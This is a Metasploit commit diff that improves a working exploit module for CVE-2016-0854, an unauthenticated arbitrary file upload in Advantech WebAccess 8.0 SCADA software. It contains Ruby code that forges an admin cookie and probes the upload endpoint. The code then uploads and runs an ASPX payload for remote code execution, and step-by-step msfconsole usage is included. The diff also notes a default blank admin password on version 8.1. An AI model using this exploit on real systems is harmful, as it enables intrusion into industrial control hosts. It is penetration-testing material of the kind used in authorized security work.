Land #6874, Improve exploit for CVE-2016-0854
commit
21d74a64fe
|
@ -0,0 +1,36 @@
|
|||
Advantech WebAccess is a web-based software package for human-machine interfaces and supervisory
|
||||
control and data acquisition (SCADA). WebAccess 8.0 suffers from a vulnerability that allows an
|
||||
attacker to upload a malicious file onto the web server, and gain arbitrary code execution under
|
||||
the context of IIS APPPOOL\WADashboard_pool.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
All builds of Advantech WebAccess 8.0 are affected:
|
||||
|
||||
* [WebAccess 8.0 _20150816](http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20150816.exe)
|
||||
* [WebAccess 8.0 _20141103](http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20141103_3.4.3.exe)
|
||||
|
||||
For exploitation, there is a difference between the two versions. The 2014 version of WebAccess 8.0
|
||||
had two upload actions in the UploadAjaxAction class: uploadBannerImage, and uploadImageCommon. The
|
||||
2015 version of WebAccess 8.0 added another upload action: uploadFile. This exploit uses the
|
||||
uploadImageCommon action because it works for both.
|
||||
|
||||
Advantech WebAccess 8.1 mitigated the vulnerability by enforcing authentication for
|
||||
UploadAjaxAction. However, keep in mind that WebAccess 8.1 comes with a default credential of
|
||||
user name "admin" with a blank password, which means the user is likely still at risk by using the
|
||||
default configuration.
|
||||
|
||||
advantech_webaccess_dashboard_file_upload will not attempt to exploit WebAccess 8.1.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start a Windows machine (such as Windows 7 SP1).
|
||||
2. To install Advantech WebAccess, make sure to install the Internet Information Services Windows
|
||||
feature.
|
||||
3. Download WebAccess 8.0, and install it. After installation, make sure the web application is
|
||||
operational by accessing with a browser (on port 80).
|
||||
4. Start msfconsole
|
||||
5. Do: ```use exploit/windows/scada/advantech_webaccess_dashboard_file_upload```
|
||||
6. Do: ```set RHOST [TARGET_IP]```
|
||||
7. Set other options if needed
|
||||
8. Do: ```exploit```, and you should get a session.
|
|
@ -9,10 +9,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => "Advantech WebAccess Dashboard Viewer Arbitrary File Upload",
|
||||
'Name' => "Advantech WebAccess Dashboard Viewer uploadImageCommon Arbitrary File Upload",
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary file upload vulnerability found in Advantech WebAccess 8.0.
|
||||
|
||||
|
@ -27,7 +28,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'rgod', # Vulnerability discovery
|
||||
'Zhou Yu <504137480[at]qq.com>' # MSF module
|
||||
'Zhou Yu <504137480[at]qq.com>', # MSF module
|
||||
'sinn3r' # Explicit check && better support of 8.0 (2014 and 2015)
|
||||
],
|
||||
'References' => [
|
||||
[ 'CVE', '2016-0854' ],
|
||||
|
@ -49,35 +51,45 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
], self.class)
|
||||
end
|
||||
|
||||
def version_match(data)
|
||||
# Software Build : 8.0-2015.08.15
|
||||
fingerprint = data.match(/Software\sBuild\s:\s(?<version>\d{1,2}\.\d{1,2})-(?<year>\d{4})\.(?<month>\d{1,2})\.(?<day>\d{1,2})/)
|
||||
fingerprint['version'] unless fingerprint.nil?
|
||||
def print_status(msg='')
|
||||
super("#{peer} - #{msg}")
|
||||
end
|
||||
|
||||
def vuln_version?
|
||||
res = send_request_cgi!(
|
||||
'method' => 'GET',
|
||||
'uri' => target_uri.to_s
|
||||
uri = normalize_uri(target_uri, 'WADashboard', 'ajax', 'UploadAjaxAction.aspx')
|
||||
|
||||
data = Rex::MIME::Message.new
|
||||
# If we can access the uploadImageCommon action name, that indicates the server is vulnerable
|
||||
# to our attack. The "patched" version requires authentication, so we don't have access to
|
||||
# the action name.
|
||||
data.add_part('uploadImageCommon', nil, nil, 'form-data; name="actionName"')
|
||||
|
||||
res = send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => uri,
|
||||
'cookie' => "waUserName=admin",
|
||||
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
||||
'data' => data.to_s
|
||||
)
|
||||
|
||||
ver = res && res.body ? version_match(res.body) : nil
|
||||
true ? Gem::Version.new(ver) == Gem::Version.new('8.0') : false
|
||||
res = res.get_json_document
|
||||
res['resStatus'] && res['resStatus'] == '1'
|
||||
end
|
||||
|
||||
def check
|
||||
if vuln_version?
|
||||
Exploit::CheckCode::Appears
|
||||
Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
def upload_file?(filename, file)
|
||||
print_status("Uploading: #{filename}")
|
||||
uri = normalize_uri(target_uri, 'WADashboard', 'ajax', 'UploadAjaxAction.aspx')
|
||||
|
||||
data = Rex::MIME::Message.new
|
||||
data.add_part('uploadFile', nil, nil, 'form-data; name="actionName"')
|
||||
data.add_part('uploadImageCommon', nil, nil, 'form-data; name="actionName"')
|
||||
data.add_part(file, nil, nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
|
||||
|
||||
res = send_request_cgi(
|
||||
|
@ -87,7 +99,19 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
||||
'data' => data.to_s
|
||||
)
|
||||
true ? res && res.code == 200 && res.body.include?("{\"resStatus\":\"0\",\"resString\":\"\/#{filename}\"}") : false
|
||||
|
||||
if res.get_json_document.empty?
|
||||
false
|
||||
else
|
||||
# Only register when we know the upload was successful.
|
||||
#
|
||||
# When we get a session, we start at:
|
||||
# c:\windows\system32\inetsrv
|
||||
# But our malicious file is at C:\Inetpub\wwwroot\broadweb\WADashboard
|
||||
register_file_for_cleanup("../../../Inetpub/wwwroot/broadweb/WADashboard/#{filename}")
|
||||
|
||||
true
|
||||
end
|
||||
end
|
||||
|
||||
def exec_file?(filename)
|
||||
|
@ -103,14 +127,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'uri' => uri,
|
||||
'cookie' => res.get_cookies
|
||||
)
|
||||
true ? res && res.code == 200 : false
|
||||
res && res.code == 200
|
||||
end
|
||||
|
||||
def exploit
|
||||
unless vuln_version?
|
||||
print_status("#{peer} - Cannot reliably check exploitability.")
|
||||
print_status('Target is not vulnerable.')
|
||||
return
|
||||
end
|
||||
|
||||
filename = "#{Rex::Text.rand_text_alpha(5)}.aspx"
|
||||
filedata = Msf::Util::EXE.to_exe_aspx(generate_payload_exe)
|
||||
|
||||
|
|
Loading…
Reference in New Issue